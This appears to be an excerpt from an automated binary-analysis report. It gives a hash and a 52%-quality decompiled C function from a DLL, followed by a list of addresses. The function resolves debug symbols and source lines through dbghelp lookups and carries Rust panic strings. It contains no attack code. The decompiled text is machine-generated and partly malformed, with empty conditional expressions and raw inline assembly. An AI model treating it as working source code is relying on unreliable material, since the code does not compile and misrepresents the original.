                          • Instruction Fuzzy Hash: D89200715093819FD3B9CF25C98AB9FBBE1BBD5304F10891DE6CA86260D7B18949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23E890, Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 588libraryloaderCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6F23E890(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
				void* _v16;
				char _v4528;
				void* __ebp;
				char* _t225;
				void* _t234;
				void* _t237;
				signed int _t240;
				signed int _t243;
				signed char _t249;
				intOrPtr _t250;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed char _t262;
				signed int _t265;
				signed short _t267;
				signed short* _t269;
				signed int _t273;
				void* _t277;
				void* _t278;
				intOrPtr _t279;
				signed int _t281;
				void* _t283;
				intOrPtr _t284;
				signed int _t286;
				signed short _t290;
				signed int _t292;
				signed short* _t293;
				signed short _t294;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t302;
				signed int _t304;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed short* _t317;
				intOrPtr _t321;
				intOrPtr _t322;
				void* _t328;
				signed int _t330;
				intOrPtr _t333;
				signed int _t337;
				void* _t338;
				void* _t346;
				intOrPtr _t350;
				signed short* _t353;
				signed int _t354;
				signed int _t357;
				void* _t358;
				signed int _t365;
				void* _t366;
				signed short* _t369;
				signed int _t371;
				signed int _t373;
				signed short* _t379;
				signed int _t381;
				signed char _t384;
				signed char _t385;
				intOrPtr _t392;
				signed int* _t393;
				signed char _t394;
				signed int _t397;
				signed char _t398;
				signed int _t399;
				signed int _t400;
				signed short _t401;
				signed int _t407;
				signed int _t409;
				signed char _t410;
				signed int _t411;
				signed short _t412;
				signed int _t418;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;

				_t365 = __edx;
				_t321 = __ecx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t424 = _t423 & 0xfffffff0;
				E6F24A000(0x11b0);
				_t418 = _t424;
				 *((intOrPtr*)(_t418 + 0x1198)) = _t421;
				 *(_t418 + 0x119c) = _t424;
				 *(_t418 + 0x11a8) = 0xffffffff;
				 *((intOrPtr*)(_t418 + 0x11a4)) = E6F243BB0;
				 *((intOrPtr*)(_t418 + 0x11a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t418 + 0x11a0;
				 *((intOrPtr*)(_t418 + 0x5c)) = __edx;
				_t225 =  *((intOrPtr*)(__ecx));
				if( *_t225 != 0 ||  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))) <= 0x64) {
					_t392 =  *((intOrPtr*)(_t321 + 8));
					_t301 =  *(_t321 + 0xc);
					 *((intOrPtr*)(_t418 + 0x80)) = _t321;
					_t322 =  *((intOrPtr*)(_t321 + 0x10));
					 *(_t418 + 0x1c) = _t365;
					_t366 = _t418 + 0x12;
					 *(_t418 + 0x12) = 0;
					 *((char*)(_t418 + 0x13)) = 0;
					 *(_t418 + 0x84) = _t366;
					 *((intOrPtr*)(_t418 + 0x88)) = _t225;
					 *((intOrPtr*)(_t418 + 0x8c)) = _t392;
					 *((intOrPtr*)(_t418 + 0x90)) = _t418 + 0x13;
					 *(_t418 + 0x94) = _t301;
					 *((intOrPtr*)(_t418 + 0x98)) = _t322;
					 *((intOrPtr*)(_t418 + 0x7c)) = _t392;
					 *(_t418 + 0x58) = _t301;
					 *((intOrPtr*)(_t418 + 0x78)) = _t322;
					 *((intOrPtr*)(_t418 + 0x9c)) = _t418 + 0x5c;
					if(E6F23E690(_t301, _t392, _t418) == 0) {
						_t393 =  *(_t418 + 0x1c);
						 *(_t418 + 0x2c) = _t366;
						__eflags =  *_t393 ^ 0x00000001 | _t393[1];
						if(( *_t393 ^ 0x00000001 | _t393[1]) != 0) {
							E6F24C310(_t393, _t418 + 0x1a4, 0, 0xff4);
							_t424 = _t424 + 0xc;
							_t302 =  *0x6f28adfc; // 0x0
							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
							__eflags = _t302;
							if(_t302 != 0) {
								L33:
								_t234 = GetCurrentProcess();
								_t394 = _t393[0x45];
								 *(_t418 + 0x18) = _t234;
								 *(_t418 + 0xa4) = 0;
								 *(_t418 + 0xa0) = 0;
								_t369 =  <  ? 0 : _t393[2] - 1;
								 *(_t418 + 0x20) = _t394;
								 *(_t418 + 0x30) = _t369;
								_t237 =  *_t302( *(_t418 + 0x18), _t369, 0, _t394, _t418 + 0xa0, _t418 + 0x1a0);
								__eflags = _t237 - 1;
								if(_t237 != 1) {
									goto L75;
								} else {
									_t250 =  *((intOrPtr*)(_t418 + 0x1ec));
									asm("xorps xmm0, xmm0");
									_t304 = _t418 + 0x1f4;
									_t371 = _t418 + 0xa0;
									 *(_t418 + 0xc) = 0;
									asm("movaps [esi+0x190], xmm0");
									asm("movaps [esi+0x180], xmm0");
									asm("movaps [esi+0x170], xmm0");
									asm("movaps [esi+0x160], xmm0");
									asm("movaps [esi+0x150], xmm0");
									asm("movaps [esi+0x140], xmm0");
									asm("movaps [esi+0x130], xmm0");
									asm("movaps [esi+0x120], xmm0");
									asm("movaps [esi+0x110], xmm0");
									asm("movaps [esi+0x100], xmm0");
									asm("movaps [esi+0xf0], xmm0");
									asm("movaps [esi+0xe0], xmm0");
									asm("movaps [esi+0xd0], xmm0");
									asm("movaps [esi+0xc0], xmm0");
									asm("movaps [esi+0xb0], xmm0");
									asm("movaps [esi+0xa0], xmm0");
									_t328 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
									__eflags = _t250 - _t328;
									_t329 =  <=  ? _t250 : _t328;
									_t330 = 0;
									 *(_t418 + 0x14) = _t418 + 0x1f4 + ( <=  ? _t250 : _t328) * 2;
									__eflags = 0;
									 *(_t418 + 0x18) = 0x100;
									if(0 == 0) {
										L37:
										__eflags = _t304 -  *(_t418 + 0x14);
										if(_t304 !=  *(_t418 + 0x14)) {
											_t400 = _t304;
											_t304 = _t304 + 2;
											__eflags = _t304;
											_t401 =  *_t400 & 0x0000ffff;
											goto L39;
										}
									} else {
										asm("o16 nop [cs:eax+eax]");
										L36:
										_t401 = _t330 >> 0x10;
										L39:
										 *(_t418 + 0x1c) = _t330 & 0xffff0000;
										__eflags = (_t401 & 0x0000f800) - 0xd800;
										if((_t401 & 0x0000f800) != 0xd800) {
											 *(_t418 + 0x24) = _t304;
											_t337 = _t401 & 0x0000ffff;
											_t262 = 0;
										} else {
											_t269 = _t304;
											_t337 = 0;
											__eflags = (_t401 & 0x0000ffff) - 0xdbff;
											if((_t401 & 0x0000ffff) <= 0xdbff) {
												_t309 =  *(_t418 + 0x14);
												__eflags = _t269 - _t309;
												if(_t269 == _t309) {
													 *(_t418 + 0x24) = _t309;
													goto L48;
												} else {
													_t310 =  *_t269 & 0x0000ffff;
													 *(_t418 + 0x24) =  &(_t269[1]);
													 *(_t418 + 0x28) = _t310;
													__eflags = (_t310 & 0x0000fc00) - 0xdc00;
													if((_t310 & 0x0000fc00) != 0xdc00) {
														 *(_t418 + 0x1c) = ( *(_t418 + 0x28) & 0x0000ffff) << 0x00000010 | 0x00000001;
														asm("o16 nop [eax+eax]");
														goto L48;
													} else {
														_t262 = 0;
														_t337 = ( *(_t418 + 0x28) + 0x00002400 & 0x0000ffff | (_t401 + 0x00002800 & 0x0000ffff) << 0x0000000a) + 0x10000;
													}
												}
											} else {
												 *(_t418 + 0x24) = _t269;
												L48:
												_t262 = 1;
											}
										}
										_t304 =  *(_t418 + 0x18);
										__eflags = _t262 & 0x00000001;
										_t394 = 1;
										_t338 =  !=  ? 0xfffd : _t337;
										__eflags = _t338 - 0x80;
										if(_t338 >= 0x80) {
											_t394 = 2;
											__eflags = _t338 - 0x800;
											if(_t338 >= 0x800) {
												__eflags = _t338 - 0x10000;
												_t394 = 4;
												asm("sbb edi, 0x0");
											}
										}
										_t265 = _t304 - _t394;
										__eflags = _t265;
										 *(_t418 + 0x28) = _t265;
										if(_t265 > 0) {
											 *(_t418 + 0x34) = _t394;
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x18) = _t371;
											E6F23DD00(_t304, _t338, _t371, _t394, _t418, _t421, _t304);
											_t424 = _t424 + 4;
											_t267 =  *(_t418 + 0x34);
											_t330 =  *(_t418 + 0x1c);
											_t304 =  *(_t418 + 0x24);
											_t371 =  *(_t418 + 0x18) + _t267;
											 *(_t418 + 0xc) =  *(_t418 + 0xc) + _t267;
											__eflags = _t330;
											 *(_t418 + 0x18) =  *(_t418 + 0x28);
											if(_t330 != 0) {
												goto L36;
											} else {
												goto L37;
											}
										}
									}
									__eflags =  *(_t418 + 0xc) - 0x101;
									if(__eflags >= 0) {
										 *(_t418 + 0x11a8) = 0;
										E6F256DB0(_t304,  *(_t418 + 0xc), 0x100, _t394, _t418, __eflags, 0x6f27e1dc);
										goto L87;
									} else {
										_t397 =  *0x6f28ae00; // 0x0
										asm("xorps xmm0, xmm0");
										 *(_t418 + 0x74) = 0;
										 *(_t418 + 0x70) = 0;
										asm("movaps [esi+0x60], xmm0");
										 *((intOrPtr*)(_t418 + 0x60)) = 0x18;
										__eflags = _t397;
										if(_t397 != 0) {
											L67:
											_t255 = GetCurrentProcess();
											_t333 = _t418 + 0x60;
											 *(_t418 + 0x38) = 0;
											_t373 = _t418 + 0x38;
											_t256 =  *_t397(_t255,  *(_t418 + 0x30), 0,  *(_t418 + 0x20), 0, 0, _t373, _t333);
											__eflags = _t256 - 1;
											if(_t256 != 1) {
												_t398 = 0;
												__eflags = 0;
											} else {
												_t256 =  *((intOrPtr*)(_t418 + 0x68));
												_t333 =  *((intOrPtr*)(_t418 + 0x6c));
												_t399 = 0;
												__eflags = 0;
												asm("o16 nop [cs:eax+eax]");
												do {
													_t373 = _t399;
													_t399 = _t399 + 1;
													__eflags =  *((short*)(_t333 + _t373 * 2));
												} while ( *((short*)(_t333 + _t373 * 2)) != 0);
												 *(_t418 + 0x11a8) = 0;
												_t398 = 1;
											}
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x38) = _t418 + 0xa0;
											 *(_t418 + 0x3c) =  *(_t418 + 0xc);
											 *((intOrPtr*)(_t418 + 0x40)) =  *((intOrPtr*)(_t418 + 0x1d8));
											 *(_t418 + 0x44) = _t398;
											 *((intOrPtr*)(_t418 + 0x48)) = _t256;
											 *(_t418 + 0x4c) = _t398;
											 *((intOrPtr*)(_t418 + 0x50)) = _t333;
											 *(_t418 + 0x54) = _t373;
											E6F23FA10(_t418 + 0x84, _t418 + 0x38);
											goto L75;
										} else {
											_t258 = GetProcAddress( *0x6f28add0, "SymGetLineFromInlineContextW");
											__eflags = _t258;
											if(__eflags == 0) {
												 *(_t418 + 0x11a8) = 0;
												E6F256E20(_t304, "called `Option::unwrap()` on a `None` value", 0x2b, _t397, _t418, __eflags, 0x6f27e2c0);
												goto L87;
											} else {
												_t397 = _t258;
												 *0x6f28ae00 = _t258;
												goto L67;
											}
										}
									}
								}
							} else {
								_t273 = GetProcAddress( *0x6f28add0, "SymFromInlineContextW");
								__eflags = _t273;
								if(__eflags == 0) {
									 *(_t418 + 0x11a8) = 0;
									E6F256E20(_t302, "called `Option::unwrap()` on a `None` value", 0x2b, _t393, _t418, __eflags, 0x6f27e2c0);
									goto L87;
								} else {
									_t302 = _t273;
									 *0x6f28adfc = _t273;
									goto L33;
								}
							}
						} else {
							_t312 = _t393[2];
							E6F24C310(_t393, _t418 + 0x1a4, 0, 0xff4);
							_t424 = _t424 + 0xc;
							_t407 =  *0x6f28adf0; // 0x0
							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
							__eflags = _t407;
							if(_t407 != 0) {
								L9:
								_t277 = GetCurrentProcess();
								 *(_t418 + 0xa4) = 0;
								 *(_t418 + 0xa0) = 0;
								_t278 =  *_t407(_t277, _t312, 0, _t418 + 0xa0, _t418 + 0x1a0);
								__eflags = _t278 - 1;
								if(_t278 != 1) {
									L75:
									ReleaseMutex( *(_t418 + 0x2c));
									__eflags =  *((char*)(_t418 + 0x13));
									if( *((char*)(_t418 + 0x13)) != 0) {
										goto L4;
									} else {
										goto L76;
									}
									goto L80;
								} else {
									_t279 =  *((intOrPtr*)(_t418 + 0x1ec));
									asm("xorps xmm0, xmm0");
									_t408 = 0x100;
									 *(_t418 + 0x20) = 0;
									 *(_t418 + 0x14) = _t312;
									asm("movaps [esi+0x190], xmm0");
									asm("movaps [esi+0x180], xmm0");
									asm("movaps [esi+0x170], xmm0");
									asm("movaps [esi+0x160], xmm0");
									asm("movaps [esi+0x150], xmm0");
									asm("movaps [esi+0x140], xmm0");
									asm("movaps [esi+0x130], xmm0");
									asm("movaps [esi+0x120], xmm0");
									asm("movaps [esi+0x110], xmm0");
									asm("movaps [esi+0x100], xmm0");
									asm("movaps [esi+0xf0], xmm0");
									asm("movaps [esi+0xe0], xmm0");
									asm("movaps [esi+0xd0], xmm0");
									asm("movaps [esi+0xc0], xmm0");
									asm("movaps [esi+0xb0], xmm0");
									asm("movaps [esi+0xa0], xmm0");
									_t346 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
									__eflags = _t279 - _t346;
									_t347 =  <=  ? _t279 : _t346;
									_t379 = _t418 + 0x1f4 + ( <=  ? _t279 : _t346) * 2;
									 *(_t418 + 0xc) = _t418 + 0x1f4;
									_t281 = 0;
									 *(_t418 + 0x30) = _t379;
									__eflags = 0;
									 *(_t418 + 0x1c) = _t418 + 0xa0;
									 *(_t418 + 0x28) = 0x100;
									if(0 == 0) {
										L13:
										__eflags =  *(_t418 + 0xc) - _t379;
										if( *(_t418 + 0xc) != _t379) {
											_t353 =  *(_t418 + 0xc);
											_t412 =  *_t353 & 0x0000ffff;
											_t354 =  &(_t353[1]);
											__eflags = _t354;
											 *(_t418 + 0xc) = _t354;
											goto L15;
										}
									} else {
										L12:
										_t412 = _t281 >> 0x10;
										L15:
										 *(_t418 + 0x18) = _t281 & 0xffff0000;
										__eflags = (_t412 & 0x0000f800) - 0xd800;
										if((_t412 & 0x0000f800) != 0xd800) {
											_t357 = _t412 & 0x0000ffff;
											_t384 = 0;
										} else {
											_t357 = 0;
											_t384 = 1;
											__eflags = (_t412 & 0x0000ffff) - 0xdbff;
											if((_t412 & 0x0000ffff) <= 0xdbff) {
												_t317 =  *(_t418 + 0xc);
												_t293 =  *(_t418 + 0x30);
												__eflags = _t317 - _t293;
												if(_t317 == _t293) {
													 *(_t418 + 0xc) = _t293;
												} else {
													_t294 =  *_t317 & 0x0000ffff;
													 *(_t418 + 0xc) =  &(_t317[1]);
													__eflags = (_t294 & 0x0000fc00) - 0xdc00;
													if((_t294 & 0x0000fc00) != 0xdc00) {
														_t297 = (_t294 & 0x0000ffff) << 0x00000010 | 0x00000001;
														__eflags = _t297;
														 *(_t418 + 0x18) = _t297;
													} else {
														_t384 = 0;
														_t357 = (_t294 + 0x00002400 & 0x0000ffff | (_t412 + 0x00002800 & 0x0000ffff) << 0x0000000a) + 0x10000;
													}
												}
											}
											_t312 =  *(_t418 + 0x14);
										}
										__eflags = _t384 & 0x00000001;
										_t385 = 1;
										_t358 =  !=  ? 0xfffd : _t357;
										_t290 =  *(_t418 + 0x28);
										__eflags = _t358 - 0x80;
										if(_t358 >= 0x80) {
											_t385 = 2;
											__eflags = _t358 - 0x800;
											if(_t358 >= 0x800) {
												__eflags = _t358 - 0x10000;
												_t385 = 4;
												asm("sbb edx, 0x0");
											}
										}
										_t408 = _t290 - _t385;
										__eflags = _t408;
										if(_t408 > 0) {
											 *(_t418 + 0x24) = _t385;
											 *(_t418 + 0x34) = _t408;
											 *(_t418 + 0x11a8) = 0;
											E6F23DD00(_t312, _t358,  *(_t418 + 0x1c), _t408, _t418, _t421, _t290);
											_t424 = _t424 + 4;
											_t292 =  *(_t418 + 0x24);
											_t408 =  *(_t418 + 0x34);
											_t312 =  *(_t418 + 0x14);
											_t379 =  *(_t418 + 0x30);
											 *(_t418 + 0x20) =  *(_t418 + 0x20) + _t292;
											_t281 =  *(_t418 + 0x18);
											__eflags = _t281;
											 *(_t418 + 0x1c) =  *(_t418 + 0x1c) + _t292;
											 *(_t418 + 0x28) =  *(_t418 + 0x34);
											if(_t281 != 0) {
												goto L12;
											} else {
												goto L13;
											}
										}
									}
									__eflags =  *(_t418 + 0x20) - 0x101;
									if(__eflags >= 0) {
										 *(_t418 + 0x11a8) = 0;
										E6F256DB0(_t312,  *(_t418 + 0x20), 0x100, _t408, _t418, __eflags, 0x6f27e1dc);
										goto L87;
									} else {
										_t409 =  *0x6f28adf4; // 0x0
										asm("xorps xmm0, xmm0");
										 *(_t418 + 0x74) = 0;
										 *(_t418 + 0x70) = 0;
										asm("movaps [esi+0x60], xmm0");
										 *((intOrPtr*)(_t418 + 0x60)) = 0x18;
										__eflags = _t409;
										if(_t409 != 0) {
											L59:
											_t283 = GetCurrentProcess();
											_t350 = _t418 + 0x60;
											 *(_t418 + 0x38) = 0;
											_t381 = _t418 + 0x38;
											_t284 =  *_t409(_t283, _t312, 0, _t381, _t350);
											__eflags = _t284 - 1;
											if(_t284 != 1) {
												_t410 = 0;
												__eflags = 0;
											} else {
												_t284 =  *((intOrPtr*)(_t418 + 0x68));
												_t350 =  *((intOrPtr*)(_t418 + 0x6c));
												_t411 = 0;
												__eflags = 0;
												asm("o16 nop [cs:eax+eax]");
												do {
													_t381 = _t411;
													_t411 = _t411 + 1;
													__eflags =  *((short*)(_t350 + _t381 * 2));
												} while ( *((short*)(_t350 + _t381 * 2)) != 0);
												 *(_t418 + 0x11a8) = 0;
												_t410 = 1;
											}
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x38) = _t418 + 0xa0;
											 *(_t418 + 0x3c) =  *(_t418 + 0x20);
											 *((intOrPtr*)(_t418 + 0x40)) =  *((intOrPtr*)(_t418 + 0x1d8));
											 *(_t418 + 0x44) = _t410;
											 *((intOrPtr*)(_t418 + 0x48)) = _t284;
											 *(_t418 + 0x4c) = _t410;
											 *((intOrPtr*)(_t418 + 0x50)) = _t350;
											 *(_t418 + 0x54) = _t381;
											E6F23FA10(_t418 + 0x84, _t418 + 0x38);
											goto L75;
										} else {
											_t286 = GetProcAddress( *0x6f28add0, "SymGetLineFromAddrW64");
											__eflags = _t286;
											if(__eflags == 0) {
												 *(_t418 + 0x11a8) = 0;
												E6F256E20(_t312, "called `Option::unwrap()` on a `None` value", 0x2b, _t409, _t418, __eflags, 0x6f27e2c0);
												goto L87;
											} else {
												_t409 = _t286;
												 *0x6f28adf4 = _t286;
												goto L59;
											}
										}
									}
								}
							} else {
								_t298 = GetProcAddress( *0x6f28add0, "SymFromAddrW");
								__eflags = _t298;
								if(__eflags == 0) {
									 *(_t418 + 0x11a8) = 0;
									E6F256E20(_t312, "called `Option::unwrap()` on a `None` value", 0x2b, _t407, _t418, __eflags, 0x6f27e2c0);
									L87:
									asm("ud2");
									asm("o16 nop [eax+eax]");
									_push(_t421);
									return E6F23E880( *((intOrPtr*)( &_v4528 + 0x2c)));
								} else {
									_t407 = _t298;
									 *0x6f28adf0 = _t298;
									goto L9;
								}
							}
						}
					} else {
						if( *((char*)(_t418 + 0x13)) == 0) {
							L76:
							__eflags =  *(_t418 + 0x12);
							if( *(_t418 + 0x12) == 0) {
								__eflags =  *((char*)( *((intOrPtr*)(_t418 + 0x7c))));
								if( *((char*)( *((intOrPtr*)(_t418 + 0x7c)))) != 0) {
									 *(_t418 + 0x38) =  *((intOrPtr*)(_t418 + 0x78));
									 *(_t418 + 0x3c) = 0;
									 *(_t418 + 0x1a8) = 4;
									 *(_t418 + 0xa0) = 2;
									 *(_t418 + 0x11a8) = 1;
									_push(0);
									_push(_t418 + 0xa0);
									_push(_t418 + 0x1a0);
									 *( *(_t418 + 0x58)) = E6F23F250(_t418 + 0x38,  *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x5c)) + 8)));
									_t249 =  *(_t418 + 0x38);
									_t202 = _t249 + 4;
									 *_t202 =  *(_t249 + 4) + 1;
									__eflags =  *_t202;
								}
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x80)) + 4)))) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x80)) + 4)))) + 1;
							_t243 =  *(_t418 + 0x58);
							__eflags =  *_t243;
							_t208 =  *_t243 == 0;
							__eflags = _t208;
							_t240 = _t243 & 0xffffff00 | _t208;
						} else {
							goto L4;
						}
						goto L80;
					}
				} else {
					L4:
					_t240 = 0;
					L80:
					 *[fs:0x0] =  *((intOrPtr*)(_t418 + 0x11a0));
					return _t240;
				}
			}
















































































                          0x6f23e890
                          0x6f23e890
                          0x6f23e893
                          0x6f23e894
                          0x6f23e895
                          0x6f23e896
                          0x6f23e89e
                          0x6f23e8a3
                          0x6f23e8a5
                          0x6f23e8ab
                          0x6f23e8b1
                          0x6f23e8bb
                          0x6f23e8d2
                          0x6f23e8d8
                          0x6f23e8de
                          0x6f23e8e1
                          0x6f23e8e6
                          0x6f23e8f0
                          0x6f23e8f3
                          0x6f23e8f6
                          0x6f23e8fc
                          0x6f23e8ff
                          0x6f23e902
                          0x6f23e905
                          0x6f23e909
                          0x6f23e90d
                          0x6f23e913
                          0x6f23e91c
                          0x6f23e922
                          0x6f23e92b
                          0x6f23e931
                          0x6f23e937
                          0x6f23e93a
                          0x6f23e93d
                          0x6f23e940
                          0x6f23e94d
                          0x6f23e960
                          0x6f23e963
                          0x6f23e96b
                          0x6f23e96e
                          0x6f23ec18
                          0x6f23ec1d
                          0x6f23ec20
                          0x6f23ec26
                          0x6f23ec30
                          0x6f23ec3a
                          0x6f23ec3c
                          0x6f23ec5e
                          0x6f23ec5e
                          0x6f23ec66
                          0x6f23ec6c
                          0x6f23ec77
                          0x6f23ec81
                          0x6f23ec8e
                          0x6f23ec99
                          0x6f23ec9f
                          0x6f23eca6
                          0x6f23eca8
                          0x6f23ecab
                          0x00000000
                          0x6f23ecb1
                          0x6f23ecb7
                          0x6f23ecbd
                          0x6f23ecc0
                          0x6f23ecc6
                          0x6f23eccc
                          0x6f23ecd3
                          0x6f23ecda
                          0x6f23ece1
                          0x6f23ece8
                          0x6f23ecef
                          0x6f23ecf6
                          0x6f23ecfd
                          0x6f23ed04
                          0x6f23ed0b
                          0x6f23ed12
                          0x6f23ed19
                          0x6f23ed20
                          0x6f23ed27
                          0x6f23ed2e
                          0x6f23ed35
                          0x6f23ed3c
                          0x6f23ed43
                          0x6f23ed44
                          0x6f23ed46
                          0x6f23ed50
                          0x6f23ed52
                          0x6f23ed5a
                          0x6f23ed5d
                          0x6f23ed60
                          0x6f23ed80
                          0x6f23ed80
                          0x6f23ed83
                          0x6f23ed89
                          0x6f23ed8b
                          0x6f23ed8b
                          0x6f23ed8e
                          0x00000000
                          0x6f23ed8e
                          0x6f23ed62
                          0x6f23ed62
                          0x6f23ed70
                          0x6f23ed72
                          0x6f23ed91
                          0x6f23ed9e
                          0x6f23eda1
                          0x6f23eda6
                          0x6f23edc0
                          0x6f23edc3
                          0x6f23edc6
                          0x6f23eda8
                          0x6f23eda8
                          0x6f23edad
                          0x6f23edaf
                          0x6f23edb5
                          0x6f23edd0
                          0x6f23edd3
                          0x6f23edd5
                          0x6f23ee15
                          0x00000000
                          0x6f23edd7
                          0x6f23edd7
                          0x6f23eddd
                          0x6f23ede0
                          0x6f23ede9
                          0x6f23edef
                          0x6f23ee24
                          0x6f23ee27
                          0x00000000
                          0x6f23edf1
                          0x6f23ee0b
                          0x6f23ee0d
                          0x6f23ee0d
                          0x6f23edef
                          0x6f23edb7
                          0x6f23edb7
                          0x6f23ee30
                          0x6f23ee30
                          0x6f23ee30
                          0x6f23edb5
                          0x6f23ee35
                          0x6f23ee38
                          0x6f23ee3f
                          0x6f23ee44
                          0x6f23ee47
                          0x6f23ee4d
                          0x6f23ee4f
                          0x6f23ee54
                          0x6f23ee5a
                          0x6f23ee5c
                          0x6f23ee62
                          0x6f23ee67
                          0x6f23ee67
                          0x6f23ee5a
                          0x6f23ee6c
                          0x6f23ee6c
                          0x6f23ee6e
                          0x6f23ee71
                          0x6f23ee77
                          0x6f23ee7a
                          0x6f23ee85
                          0x6f23ee88
                          0x6f23ee8d
                          0x6f23ee90
                          0x6f23ee96
                          0x6f23ee99
                          0x6f23ee9c
                          0x6f23ee9e
                          0x6f23eea4
                          0x6f23eea7
                          0x6f23eeaa
                          0x00000000
                          0x6f23eeb0
                          0x00000000
                          0x6f23eeb0
                          0x6f23eeaa
                          0x6f23ee71
                          0x6f23ef5e
                          0x6f23ef65
                          0x6f23f15a
                          0x6f23f16e
                          0x00000000
                          0x6f23ef6b
                          0x6f23ef6b
                          0x6f23ef71
                          0x6f23ef74
                          0x6f23ef7b
                          0x6f23ef82
                          0x6f23ef86
                          0x6f23ef8d
                          0x6f23ef8f
                          0x6f23efb1
                          0x6f23efb1
                          0x6f23efb6
                          0x6f23efb9
                          0x6f23efc0
                          0x6f23efd2
                          0x6f23efd4
                          0x6f23efd7
                          0x6f23f04e
                          0x6f23f04e
                          0x6f23efd9
                          0x6f23efd9
                          0x6f23efdc
                          0x6f23efdf
                          0x6f23efdf
                          0x6f23efe1
                          0x6f23eff0
                          0x6f23eff0
                          0x6f23eff2
                          0x6f23eff3
                          0x6f23eff3
                          0x6f23effa
                          0x6f23f004
                          0x6f23f004
                          0x6f23f056
                          0x6f23f060
                          0x6f23f066
                          0x6f23f06f
                          0x6f23f072
                          0x6f23f075
                          0x6f23f078
                          0x6f23f07b
                          0x6f23f07e
                          0x6f23f08a
                          0x00000000
                          0x6f23ef91
                          0x6f23ef9c
                          0x6f23efa2
                          0x6f23efa4
                          0x6f23f1e4
                          0x6f23f1fd
                          0x00000000
                          0x6f23efaa
                          0x6f23efaa
                          0x6f23efac
                          0x00000000
                          0x6f23efac
                          0x6f23efa4
                          0x6f23ef8f
                          0x6f23ef65
                          0x6f23ec3e
                          0x6f23ec49
                          0x6f23ec4f
                          0x6f23ec51
                          0x6f23f19e
                          0x6f23f1b7
                          0x00000000
                          0x6f23ec57
                          0x6f23ec57
                          0x6f23ec59
                          0x00000000
                          0x6f23ec59
                          0x6f23ec51
                          0x6f23e974
                          0x6f23e974
                          0x6f23e985
                          0x6f23e98a
                          0x6f23e98d
                          0x6f23e993
                          0x6f23e99d
                          0x6f23e9a7
                          0x6f23e9a9
                          0x6f23e9cb
                          0x6f23e9cb
                          0x6f23e9d6
                          0x6f23e9e0
                          0x6f23e9f6
                          0x6f23e9f8
                          0x6f23e9fb
                          0x6f23f08f
                          0x6f23f093
                          0x6f23f098
                          0x6f23f09c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23ea01
                          0x6f23ea07
                          0x6f23ea0d
                          0x6f23ea10
                          0x6f23ea15
                          0x6f23ea1c
                          0x6f23ea1f
                          0x6f23ea26
                          0x6f23ea2d
                          0x6f23ea34
                          0x6f23ea3b
                          0x6f23ea42
                          0x6f23ea49
                          0x6f23ea50
                          0x6f23ea57
                          0x6f23ea5e
                          0x6f23ea65
                          0x6f23ea6c
                          0x6f23ea73
                          0x6f23ea7a
                          0x6f23ea81
                          0x6f23ea88
                          0x6f23ea8f
                          0x6f23ea90
                          0x6f23ea92
                          0x6f23ea9b
                          0x6f23eaa2
                          0x6f23eaa5
                          0x6f23eaad
                          0x6f23eab0
                          0x6f23eab3
                          0x6f23eab6
                          0x6f23eab9
                          0x6f23ead0
                          0x6f23ead0
                          0x6f23ead3
                          0x6f23ead9
                          0x6f23eadc
                          0x6f23eadf
                          0x6f23eadf
                          0x6f23eae2
                          0x00000000
                          0x6f23eae2
                          0x6f23eac0
                          0x6f23eac0
                          0x6f23eac2
                          0x6f23eae5
                          0x6f23eaf2
                          0x6f23eaf5
                          0x6f23eafb
                          0x6f23eb60
                          0x6f23eb63
                          0x6f23eafd
                          0x6f23eb00
                          0x6f23eb02
                          0x6f23eb07
                          0x6f23eb0d
                          0x6f23eb0f
                          0x6f23eb12
                          0x6f23eb15
                          0x6f23eb17
                          0x6f23eb67
                          0x6f23eb19
                          0x6f23eb19
                          0x6f23eb1f
                          0x6f23eb2a
                          0x6f23eb30
                          0x6f23eb72
                          0x6f23eb72
                          0x6f23eb75
                          0x6f23eb32
                          0x6f23eb49
                          0x6f23eb4b
                          0x6f23eb4b
                          0x6f23eb30
                          0x6f23eb17
                          0x6f23eb80
                          0x6f23eb80
                          0x6f23eb83
                          0x6f23eb8b
                          0x6f23eb90
                          0x6f23eb93
                          0x6f23eb96
                          0x6f23eb9c
                          0x6f23eb9e
                          0x6f23eba3
                          0x6f23eba9
                          0x6f23ebab
                          0x6f23ebb1
                          0x6f23ebb6
                          0x6f23ebb6
                          0x6f23eba9
                          0x6f23ebbb
                          0x6f23ebbb
                          0x6f23ebbd
                          0x6f23ebc3
                          0x6f23ebc9
                          0x6f23ebcc
                          0x6f23ebd7
                          0x6f23ebdc
                          0x6f23ebdf
                          0x6f23ebe5
                          0x6f23ebe8
                          0x6f23ebeb
                          0x6f23ebf0
                          0x6f23ebf3
                          0x6f23ebf6
                          0x6f23ebf9
                          0x6f23ebfc
                          0x6f23ebff
                          0x00000000
                          0x6f23ec05
                          0x00000000
                          0x6f23ec05
                          0x6f23ebff
                          0x6f23ebbd
                          0x6f23eeb5
                          0x6f23eebc
                          0x6f23f136
                          0x6f23f14a
                          0x00000000
                          0x6f23eec2
                          0x6f23eec2
                          0x6f23eec8
                          0x6f23eecb
                          0x6f23eed2
                          0x6f23eed9
                          0x6f23eedd
                          0x6f23eee4
